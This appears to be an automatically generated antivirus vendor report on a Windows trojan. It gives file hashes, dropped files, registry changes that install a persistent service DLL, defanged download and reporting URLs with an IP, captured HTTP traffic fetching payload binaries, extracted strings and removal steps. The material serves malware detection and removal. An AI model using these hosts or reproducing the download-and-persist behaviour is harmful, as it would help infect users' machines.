Trojan.Win32.FlyStudio_a5cd835d97

by malwarelabrobot on July 1st, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), Trojan.Win32.CHS.xv (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.3864 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), New Malware.ca (McAfee), Trojan.Gen.2 (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a5cd835d9718592ce485eba6ca2f96fe
SHA1: cfaf820881b41b91b5cb00143db7c5a8e07dc9ad
SHA256: 4a52dba0050503fb2116d3fab2b8fa06ebd6540c40468d08a745f523f2b7b0ff
SSDeep: 6144:xaWr8B6YIOmnfJlfkdp9oyzc27s3aBLNloHAOeVShXIGAX:xUkLfjfkvPzc 9NloHMVS6GAX
Size: 297488 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-27 04:46:12
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3380

The Trojan injects its code into the following process(es):

tip.exe:2892

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (94227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (33458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (44441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (144746 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (0 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdServiceGroup" = "AdService"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\%original file name%.exe,"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\services\AdService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\services\AdService]
"Description" = "AdService"

[HKLM\SOFTWARE\Microsoft\Tracing\a5cd835d9718592ce485eba6ca2f96fe_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\%original file name%.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@475B.tmp,"

Dropped PE files

MD5 File path
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
9873ea6da234c2a16383b520b71df69e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@475B.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 206947 207360 4.57226 a5dc8ce3715614bc26abf88703beba37
.rdata 212992 71910 72192 3.74691 6bc2a5aa3de496e8d9e1fa5e1de214bb
.data 286720 8108 4608 2.48916 fdb9280d0840abc427065f394a534779
.tls 294912 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 299008 488 512 3.30502 275ecc20400c97dc81fe213d32dfa1a7
.reloc 303104 11112 11264 4.54247 08c0583b24e6ec0ffd74b3f5b6830028

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
api.knsdknknndnfjenkjwwlekfj.com 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 26 Jun 2017 04:42:22 GMT
Accept-Ranges: bytes
ETag: "f440eb9936eed21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 30 Jun 2017 03:10:22 GMT
Content-Length: 978432
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
.....o.......o..-....o......#.......#.......#.........d.........y.....
......................Rich....................PE..L.....PY...........!
.....f...........0.......................................0............
@.........................0W.......W..................................
.o......8...................`...........@.............................
...............text....d.......f.................. ..`.rdata..........
.....j..............@..@.data...x:...p...(...T..............@....tls..
...............|..............@....reloc...o.......p...~..............
@..B..................................................................
......................................................................
......................................................................
......................................................................
.............................................P....fJ..h.r....`........
.d.........P.........Y......................&J..h.r...................
...........c...Y.......................I..h.r.........................
.....#...Y.......................I..h.r...............................
...Y......................fI..j.h ....................................
J1..h.s.......Y......................I..j.h$..........................
...........0..h s...B...Y................ .....H..j.h,.... .....0.....
....4......... ......0..h@s.......Y................8....vH..j.h0..
<<< skipped >>>

GET /tip.bin HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 30 Jun 2017 03:10:29 GMT
Content-Length: 304640
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........;...U...U.
..U...Y...U.m.[...U..._.U.U...^...U...F...U...F...U...T...U...^...U...
_...U...U...U.).S...U.Rich..U.........................PE..L....DKY....
................. .......|............@...............................
......................................................................
......................................................................
......................UPX0....................................UPX1....
............................@....rsrc.... ..........................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....h./wb<.j.Y.......P..&$...m..3...U..h....j.h...j
...o..i...h.R....@......$..m..(.....@..]..m...&..}.f.E....f.E..m..}m..
...$..U.M^.Ku...\..v........e....g9"t.....h..a...`5J.Q...K.d.5h..h0...
.q...W....]...{{.w..]..t.....e. ...M..`.D.l@j.j.G.....y.....-...{(l...
.%......G......k).Z4...P..d! C...."I*C.@_.P.... *.h..$9hx.L._..u...%.=
...d..u.J.....t..g....A..t;.u.......~.....3............t..A.L&..t...p.
.....t....A. ........s.*..@... ..<$Q.E..{.W.u......QW.Y..W.......Iu
.zS[.X..7E..$W.UV...2.....H;..^<...XA....6(.....f..9..gp .v<
<<< skipped >>>


GET /api/report HTTP/1.1
Server: 0a53ifYXF2kaOXkdS3gID3iIofrXkfxQW3TXvfqQ9IeKW3tIidk2wIlKoft3r2n2ldSsD3VKqfnaidWIoftIkdYskdif0Rl2TXkd8Iw3yIkdxXefoakaTsS3Tsa2aQ9dK2eUDsl3Osl3DKtsW39UlUxKM38sIQDIaal3rdlIMse39UDI93OsdQwUwUlstda2vUp3vUtXvQSQ53sQgINXyQDfkfYXiRtf5sMKnKWfSsisTsWX
Server-Key: UsI3Kd4mafR2XQP6J7BAENCLucGjZHhbg5vTnqokrxF1OYypeDwMtl9i8SzWV0
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: DnoUlph30tfVECqOdYkmzxNGZyvHWjTKP6cswuFBgMaiR1e8JQ472XSI9br5LA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 30 Jun 2017 03:10:23 GMT
[DATA]DnoUlph30tfVECqOdYkmzxNGZyvHWjTU0JDu0h0r0JDx0JDX0JDx0JDl0JDu0h02
0h0M0JDX0JDB0JDv0JDl0JDz0h0u0h0Y0JDl0JDv0JDv0JDX0JDO0JDl0JDu0h020h0u0h
0a0JDV0JD2DJDB0JDi0JDI0JDX0JDx0JDl0JDk0h0a0JDX0JDx0JDX0JDu0h0J0F0KP6cs
wuFBgMaiR1e8JQ472XSI9br5LA[DATA]HTTP/1.1 200 OK..Cache-Control: no-cac
he..Pragma: no-cache..Content-Length: 242..Content-Type: text/plain; c
harset=Windows-1252..Expires: -1..Server: Microsoft-IIS/8.5..Server-Ke
y: DnoUlph30tfVECqOdYkmzxNGZyvHWjTKP6cswuFBgMaiR1e8JQ472XSI9br5LA..X-A
spNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 30 Jun 201
7 03:10:23 GMT..[DATA]DnoUlph30tfVECqOdYkmzxNGZyvHWjTU0JDu0h0r0JDx0JDX
0JDx0JDl0JDu0h020h0M0JDX0JDB0JDv0JDl0JDz0h0u0h0Y0JDl0JDv0JDv0JDX0JDO0J
Dl0JDu0h020h0u0h0a0JDV0JD2DJDB0JDi0JDI0JDX0JDx0JDl0JDk0h0a0JDX0JDx0JDX
0JDu0h0J0F0KP6cswuFBgMaiR1e8JQ472XSI9br5LA[DATA]..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_1480:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_2892:

`.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)

tip.exe_2892_rwx_00401000_000B6000:

t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3380

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (94227 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (33458 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (44441 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (144746 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now